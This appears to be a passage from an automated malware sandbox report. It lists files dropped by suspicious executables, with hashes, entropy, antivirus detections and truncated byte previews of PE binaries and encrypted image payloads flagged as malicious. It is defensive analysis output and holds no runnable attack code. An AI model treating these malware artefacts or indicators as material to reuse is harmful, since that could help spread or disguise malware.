                                                  • Filename: 45631.exe, Detection: malicious, Browse
                                                  • Filename: 0000000000000000.exe, Detection: malicious, Browse
                                                  • Filename: T1#U5b89#U88c5#U52a9#U624b1.0.2.exe, Detection: malicious, Browse
                                                  • Filename: setup.ic19.exe, Detection: malicious, Browse
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5059989
                                                  Entropy (8bit):7.999955227108233
                                                  Encrypted:true
                                                  SSDEEP:98304:AOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:3o6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                  MD5:459D7F1351A247F7AB2544C0F8D8B4FC
                                                  SHA1:44C57787D5D1BC35F449F0E154D7FA748A0AB6C9
                                                  SHA-256:581D65B434E74483632B37BEB7454D155F1803D1C4EA5750B554E359A2ECDBAD
                                                  SHA-512:EA0C60C7C7D69780751C4D4B41E4CFF386517A7CABAC498BD717B515FF8A831BC716A8C37C8416495C01FA928DD00E9CA74BB53D5258758DA1A411B9F1958E26
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q.....q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4858192
                                                  Entropy (8bit):7.992516680863906
                                                  Encrypted:true
                                                  SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/w:9S4+O6P5OeMRrjRy7aPZbm3k8V/w
                                                  MD5:4FFB2C2E6EDC14EB645611E51DA253BF
                                                  SHA1:78C885A68296573B73E545DB32601F5CE056AA74
                                                  SHA-256:5400FE2A066D658F2054C8234834CEB064DDD636ADD8DC452AF2059B674FDFE7
                                                  SHA-512:272CFBA78489C27FA98C9BFB7E39B5E80EE392A7CB13243B808FCA4E1E4D6AD03DE503D3C079FE897EC2C21DBFA9DA85BF8FAA7E4106801A6A3CB3B0CCA1A9E9
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Program Files (x86)\qNHTRl\qNHTRl.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):365477
                                                  Entropy (8bit):7.999399133834538
                                                  Encrypted:true
                                                  SSDEEP:6144:NiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:E8u69CghoQxoMTFQqtKFCG7mbZ
                                                  MD5:CE3093DF055157AE35226A50BD7C5BB5
                                                  SHA1:2F32CC9DB5E00BAA21D7CDEB93EFF00D797493D5
                                                  SHA-256:D7C7B668A59F77AC0B3D76DA9E2D7FC05040F2C2F791D7EFBAB9AC63C9F6F6E1
                                                  SHA-512:5C593C3A90D5C460004ECF852E43478960BFF1EF47E35FE2E1A628D88C57092EC0F9420F853AB0F6EBF610E0AC23A6666B026C73C9784A3F9F587FBB2F18D89E
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.59.73......"ijstuvwxyz....oheykp.net......3#..............59.73.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):5059989
                                                  Entropy (8bit):7.999955224615887
                                                  Encrypted:true
                                                  SSDEEP:98304:uOQ8oQBU091MWehE/7o29Mtr9vBGTrBkm638mgfttxtoSrHCYE7GUcOc2s:Bo6T1MFhE/7qJwBP6TWtttriYE7kjv
                                                  MD5:AF88F4204B40699D7CE6422E7BC9534D
                                                  SHA1:8C2EC935EAF6793583E8E0F04D8BEBF764E9C375
                                                  SHA-256:D31FA56E1C61B8F91B73B4640BFD1DA255B2251C0BAE3175A4493C5EFEBA8ABC
                                                  SHA-512:EAAAB6191EDECEC731164C88AAD82799B45D4A583BA33326625FC3DBB4B44474D2F203710FAEA9761948D38CB3A7C1D47BD145CC69AFE000AC62B00D23DADF7B
                                                  Malicious:false
                                                  Preview:.PNG........IHDR.............\r.f....pHYs............... .IDATx....n.....&E!J.%M.."..9....."...H..L.....LI:.)..K7..!.4Q...{..d.....[......Z{......<.y<9.o...w....]...q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q..q......3%.F.1p..rD%.;%rD.1p.....qz.....1n.....p.....qz.....1n...0.^.I..9......c.Z....$.Q..K=.OKp=...e%.(.R.....p-tzD..9.m...+.Un...S...5..F..D......R.ys.?W.....|]....Ke......G......U..1....#^..1|..!.O.OWr.H.w.P..p.V..H.wz..mo.U....?F......k7[2.."....+...&]#..d......<...V\{P..d...8=.9..Al....Wr......Pc`......X.g..\.|i7.....O.B.g.p...]..%.^..T.w....a.u..x..zZ........V.....$.Y.6.t....?*.g.~..@.93.g.....lPn..o...7.p.J.Cq....J....3.<]...X...w..o..\.u...Jv...3e.).9q..6(..s...^.k...#..[Vr.t.47J}..M......:.....I%.Q\cPN.n...R.z;3J..c....q.].~s.J..._.d.........y....ur{:v...A.I%....)..*..t{..(.g.o...;....>..7)~{P~_.....5t{X<.x....J....J.0..YY\b.-&.?...Y7.$.X_.e.......{..Jd.3w...l......q.M...&..*...~f...[./.......w..U.^.{q.`......GVV...5.;Z.`W.-uxV...
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):54152
                                                  Entropy (8bit):6.64786972992462
                                                  Encrypted:false
                                                  SSDEEP:768:jE8w9LlgD9z/4vt+aEjzaXEjoN6Fdv9SqJvwjgCb2VIIL/o/rw3J:jE3LKDZjaEjza0jJRJviN21ME3J
                                                  MD5:7B6586E21FBC8F2F0BB784A1A8FC65B4
                                                  SHA1:E33722B4790B3C83B6F180E57D1B6BEBBC6153CB
                                                  SHA-256:7BAFB7B02EA7C52D3511F3AC21C0586E92C44738AD992D63463AADC260C81722
                                                  SHA-512:E2B4B8F5379D3ADBB5280D1C77C2AA7F5A7212173231576BAC6D7A26109B88BC5CB377CF9D879E7BE2E36CE860C9BCDA7769A22EED5ED63797F70534C6CDDA4C
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........%U..vU..vU..vK.pvL..vK.avE..vK.wv...v\.gv\..vU..v...vK.~vW..vK.`vT..vK.evT..vRichU..v........PE..L....B.O.................b...@....................@..................................g....@.....................................d.......\................-..........P...............................0...@............................................text....a.......b.................. ..`.rdata...............f..............@..@.data...............................@....rsrc...\...........................@..@.reloc..`...........................@..B........................................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4858192
                                                  Entropy (8bit):7.9925172539995515
                                                  Encrypted:true
                                                  SSDEEP:98304:9RK1dm+O6P0DvHI/Tvyegz2UrrrjRyBEXp0/aeuZmQQLFXfoGku+i17/F:9S4+O6P5OeMRrjRy7aPZbm3k8V/F
                                                  MD5:08793ABDBAD9DC07E76A78218959CAA6
                                                  SHA1:59F1F8E6F0E60768C4AD9C1D2E799619DCAD87FF
                                                  SHA-256:BF21E77CE487D306A60CBDCEA3D03962A878B18358E757EDE1E21E295B5E16B1
                                                  SHA-512:8A8F104FF344D6B0F6F45DAEEA82882862C0D8689A82E2D65EC4F905BF8AFBAC93CBCCDE033C5CBCE161EB33DFB772C09F8F352936173600D93FBF93FD30F2B3
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: Avira, Detection: 100%
                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...~..f...........!...'.,..........D)D......@................................s...........@...........................3.R.....D.P....ps...............I.(K...Ps......................................Ks.@.............).,............................text...s+.......................... ..`.rdata...n...@......................@..@.data...............................@....%?.....O.'......................... ..`.%-[....|.....).....................@....mo:....P.I...)...I................. ..`.reloc.......Ps.......I.............@..@.rsrc........ps.......I.............@..@................................................................................................................................................................................................................................................................................................................
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):365477
                                                  Entropy (8bit):7.999399006173634
                                                  Encrypted:true
                                                  SSDEEP:6144:xiACk/u6n9aBOmmD1oQFu0oMOxKnJPWyD9Dcqt1oFsnKqW7mbZ:A8u69CghoQxoMTFQqtKFCG7mbZ
                                                  MD5:93665BC9901E42E672C7E32A0BC91AD4
                                                  SHA1:F02522D0CECECF1A842931F93648E4A84B934772
                                                  SHA-256:7205DAA25ED8E79D6F21FFD6EDA1506A7242D4B540245BFDD66D17906D07F1D8
                                                  SHA-512:CB2E4ED57D6B964C96BA44C83EA7CA16B50A3B9B82C784F42B5FF09C4B7BE0A049A169DC768B12EE61856EBBACDA5F99A47277BF0D2021332267A5B30AD7F8BB
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A...a."q.2....#B...R..$3br........%&'()*456789:CDEF8.217.59.73......"ijstuvwxyz....oheykp.net......3#..............59.73.....................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:MIPSEB MIPS-III ECOFF executable
                                                  Category:modified
                                                  Size (bytes):2
                                                  Entropy (8bit):1.0
                                                  Encrypted:false
                                                  SSDEEP:3:s:s
                                                  MD5:7E74F75663E5B5A4F3452A4C603EE45D
                                                  SHA1:D5114B086B721F2C87EA7152025792958AB4C629
                                                  SHA-256:DD1E2826C0124A6D4F7397A5A71F633928926C0608B62FB9E615BA778ACC39FF
                                                  SHA-512:2F5D0D45593487BEBC2CCF968EAF2A4A3BDE1D5A29C7C2B5AD411E041C0D3B7A46BE439ED7083093057A96030683B9DEFBED1A2EF7882B3E64CF3FBC7C9CF12F
                                                  Malicious:false
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                  Preview:.@
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):4859125
                                                  Entropy (8bit):7.999956261017207
                                                  Encrypted:true
                                                  SSDEEP:98304:iwS8fBFQmSDP3eB/FsE7wRnIdq//xvpY/gMQ+nQxcweXxpuQ6SutPQNCG0o:iwSgTQfFAwdCqRvpk5QvxcwgXMSutTo
                                                  MD5:EE6CA3EEA7F9B1C81059AEF570A28C02
                                                  SHA1:14EFBF498356644D9B1327407E3F03E1BFBEA363
                                                  SHA-256:A2065EA035C4E391C0FD897A932DCFF34D2CCD34579844C732F3577BC443B196
                                                  SHA-512:563E7D7AB4A94505F1EFA5931F685A45D89CCB27A97593BF69C668AAA747C9511C8BE2AADA2E4DF3E9AB02559B564C699A8A9501B70420FAC3556758E29478D5
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~........=..>.A
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):125333
                                                  Entropy (8bit):7.993522712936246
                                                  Encrypted:true
                                                  SSDEEP:3072:8vcsO9vKcSrCpJigTY1mZzj283zsY+oOVoPj24pq:8vcXfSWT3TY1mZf13zB+a72Uq
                                                  MD5:2CA9F4AB0970AA58989D66D9458F8701
                                                  SHA1:FE5271A6D2EEBB8B3E8E9ECBA00D7FE16ABA7A5B
                                                  SHA-256:5536F773A5F358F174026758FFAE165D3A94C9C6A29471385A46C1598CFB2AD4
                                                  SHA-512:AB0EF92793407EFF3A5D427C6CB21FE73C59220A92E38EDEE3FAACB7FD4E0D43E9A1CF65135724686B1C6B5D37B8278800D102B0329614CB5478B9CECB5423C7
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):8299
                                                  Entropy (8bit):7.9354275320361545
                                                  Encrypted:false
                                                  SSDEEP:192:plfK6KTBKkGUy8DJdg0ANCT/0E/jiG4hMrnv2:pBK6KTBZGWvg0ANCT/WGFv2
                                                  MD5:9BDB6A4AF681470B85A3D46AF5A4F2A7
                                                  SHA1:D26F6151AC12EDC6FC157CBEE69DFD378FE8BF8A
                                                  SHA-256:5207B0111DC5CC23DA549559A8968EE36E39B5D8776E6F5B1E6BDC367937E7DF
                                                  SHA-512:5930985458806AF51D54196F10C3A72776EFDDA5D914F60A9B7F2DD04156288D1B8C4EB63C6EFD4A9F573E48B7B9EFE98DE815629DDD64FED8D9221A6FB8AAF4
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE...............CHI........[..>G..*C..&.!7*..E..)U&.$...z.tuv......?..............
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):366410
                                                  Entropy (8bit):7.375315637594966
                                                  Encrypted:false
                                                  SSDEEP:6144:XC/wwzn9iJzBFsJmUSmfXVz7pB+iMuVrt5DY:9ws7FsJmUSmd7pBpMgR58
                                                  MD5:DA1D5EB665D3AAD523BE59415E6449ED
                                                  SHA1:40C310E82035381410B83E4F1DA0A4410FEB8FE6
                                                  SHA-256:F919634AC7E0877663FFF06EA9E430B530073D6E79EEE543D02331F4DFF64375
                                                  SHA-512:6F179A166126C97444920636B584FB0BA4E9596A659921A2BCAA80E7DE094A87402D3E2B6D8DA8797045D7E22C3D37E6CED2A8E137E0387A1320D631B139FD36
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE.................IZ....OQPSS.U.WX..[..&6.ab.)eLghibkinoouqrsuuvw2zy{}}~.............
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):3892010
                                                  Entropy (8bit):7.995495589600101
                                                  Encrypted:true
                                                  SSDEEP:98304:NAHrPzE9m4wgyNskyumYyryfxFVLqndnA1Nfjh:j5wgHh/nyZLN1
                                                  MD5:E4E46F3980A9D799B1BD7FC408F488A3
                                                  SHA1:977461A1885C7216E787E5B1E0C752DC2067733A
                                                  SHA-256:6166EF3871E1952B05BCE5A08A1DB685E27BD83AF83B0F92AF20139DC81A4850
                                                  SHA-512:9BF3B43D27685D59F6D5690C6CDEB5E1343F40B3739DDCACD265E1B4A5EFB2431102289E30734411DF4203121238867FDE178DA3760DA537BAF0DA07CC86FCB4
                                                  Malicious:false
                                                  Preview:.PNG........IHDR..............$.....PLTE.....H..K..F.....G..H..G..H..H..D..I..G..Gf.Ff.Hf.Ff.E..H..H..H..H..H........H........H..G........G....................G..H........................................................................................................?..H..G..H..G..G..H.HH.HH.GG.GG.GG.II.GG.??.GG.DD.HH.OO.GG.HH.HH.II.HH.GG.HH.HH.GG.GG.HH.GG.UU.??.GG.GG.HH.HH.GG.33...................GG.HH..G..Gf.F...................GG.HH.GG.HH.H................f.Fg.Fg.Fb.Di.Cf.Gg.Fg.Gf.Fe.G..K.KKi.Fi.K.HHg.G....5n&....tRNS...3.Df....^..wU.MwU...3UMw....f.D"....<.....o.....+..M...^......-......1V{........-.........^...M.+....o......<."D.f...........wU3...^.."..fD".3.K.X.....IDATx....jSQ...Z#x U.T<S............8.D..#..+...A.Y.l.0E...y/!.....E.....;G^,<.A.........|..z....|.A;.@..{....... ..>.c.U;.@......u...v..`..`...a..`..`..`..`..`..`..`..`..`...O<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.L<.6.G^l.........4z.#.........=.=.h.....kw...._..~._:.[;.6..C....
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):879
                                                  Entropy (8bit):4.5851931774575325
                                                  Encrypted:false
                                                  SSDEEP:6:JRSscjAQ7F3Y+ZcRC60rdimzYFAQT7LE/o2xjC:fSscjHRY+ZcRAdimzo/OY
                                                  MD5:E54C4296F011EC91D935AA353C936E34
                                                  SHA1:53A3313D40696E87C9B8CE2BE7E67BE49DD34C20
                                                  SHA-256:81FF16AEDF9C5225CE8A03C0608CC3EA417795D98345699F2C240A0D67C6C33D
                                                  SHA-512:5D1FBA60BE82A33341E5B9E7D3C1E7B0DCC9A41B4C1F97F2930141A808D62AF56D8697CB0D2FD4894A6080DF98A3E4EEF9D98A6003C292C588F547E1C6F84DE1
                                                  Malicious:false
                                                  Preview:.V.Wf4e111111111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW1111WWWW11111111111111111111.BTE5k1=I=======.NXI9g%&A&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GBl(2%%%%%%%%%%%%%%%%%%%%%%%%%%%%%MQQU&ozzHH..9xddI..I!('.TFA[u:72KG\Q".2>S.xq<\D@n*0'''''''''''''''''''''''''''''OSSW$mxxJJ..;zffK..K#*%,VDCYw850IE^S }0<Q.zs>^FAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyyKK..:{ggJ..J"+$-WEBXv941HD_R!|1=P.{r?_GAo+1&&&&&&&&&&&&&&&&&&&&&&&&&&&&&....&&&&....&&&&....&&&9\A\999999999999999999999M[ZV$3e.-goooooooooooooooooooooooooooooooooooooo...A23"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA45(-^.[N6><!K!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):512
                                                  Entropy (8bit):5.26296536154187
                                                  Encrypted:false
                                                  SSDEEP:6:WwgONBui9QCrR0CrCa2BIDR/pYeL1g87OdUzW9E40/qcX:PgONBuUQCrZMBIDRb1gmgUzWg3
                                                  MD5:3F830864D62708390D84A4629D88083D
                                                  SHA1:79A9BB07FED0DB63C4B671000DD4069AB02ED5C3
                                                  SHA-256:9303E0E29A2AC53C31D43FC98C828A1FEB5814D2078EB868FE19CCB324D2C263
                                                  SHA-512:5DF33762B5D709E05272CD01C3B43A01671938A3F9D4DE9911EE8EF12FE89F8958493CCDFB23F940FE493B95F01A677D58F73FAACF0FC7D8C2FD5C9EA9DDD8A1
                                                  Malicious:false
                                                  Preview:....l%00XE.G#vi([[.K%f).GDG@'n!,EUYB!1l!NL.@n')&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&NRRV%lyy..L.j? a..L.l/`g....n'he....hx%h..G.$mclllllllllllllllllllllllllllllllll....o&33[F.D uj+XX.H&e*-DGDC$m"/FVZA"2o"MO.Ao&('''''''''''''''''''''''''''''''''OSSW$mxx..M.k>!`..M.m.af....o&id....iy$i..F.#jdkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkkk....~ss1TIT1111111111111111111111111111111111111GBT]2:s9UU99999999999999999999999999999999999999nVK]-<9.rwo~.P..................................QoQl ...6|ylllllllllllllllllllllllllllllllllllll
                                                  Process:C:\Users\user\Documents\7tqorj.exe
                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 144x144, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=5], baseline, precision 8, 75x55, components 3
                                                  Category:dropped
                                                  Size (bytes):55085
                                                  Entropy (8bit):7.99273647746538
                                                  Encrypted:true
                                                  SSDEEP:1536:puwkqL5y4p4KnRWlENc3PGdLLv/PJctIJPc+pifyC:kQM4+B/MLL/PmaG
                                                  MD5:DC44AE348E6A74B3A74871020FDFAC74
                                                  SHA1:B223020A5F82FF15FD5E4930477F38F34C9CB919
                                                  SHA-256:48F258037BE0FFE663DA3BCD47DBA22094CC31940083D9E18A71882BDC1ECDB8
                                                  SHA-512:5FB13A8CE2206119C76325504DEF61D4277A73D71D79157AE564F326D6FC18080218633CE7C708F31A81D6CD1A5AD8A903CFE1CC0C57183B4809A9C12E32A429
                                                  Malicious:false
                                                  Preview:......JFIF.............ZExif..MM.*.................J............Q...........Q..........%Q..........%...............C....................................................................C.......................................................................7.K.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEF..................ijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..K.Si..ZM.....x....8.h<...."..V...F(..1M<..L+.......:.(..\.ANo.)...82...O...P...2...db..u=.4...Wm%=.u&..:.\.W+L#.%5.5..q..E.PQ.....M#..c4....H.".A.R......\#..E.Vg8....PU..Yrh......".*.;...i6QE................HJJKLINOP..ST.VWXYZ[\.^_`abcdefghijklmnopqrstuvwxyz{|}~..a.....=..>.A
                                                  Process:C:\Users\user\Desktop\2749837485743-7684385786.05.exe
                                                  File Type:PNG image data, 512 x 512, 8-bit colormap, non-interlaced
                                                  Category:dropped
                                                  Size (bytes):135589
                                                  Entropy (8bit):7.995304392539578
                                                  Encrypted:true
                                                  SSDEEP:3072:CQFCJFvegK8iS+UKaskx87eJd0Cn/zUR7Tq:CKwvehSbsY8anIde
                                                  MD5:0DDD3F02B74B01D739C45956D8FD12B7
                                                  SHA1:561836F6228E24180238DF9456707A2443C5795C
                                                  SHA-256:2D3C7FBB4FBA459808F20FDC293CDC09951110302111526BC467F84A6F82F8F6
                                                  SHA-512:0D6A7700FA1B8600CAE7163EFFCD35F97B73018ECB9A17821A690C179155199689D899F8DCAD9774F486C9F28F4D127BFCA47E6D88CC72FB2CDA32F7F3D90238
                                                  Malicious:false
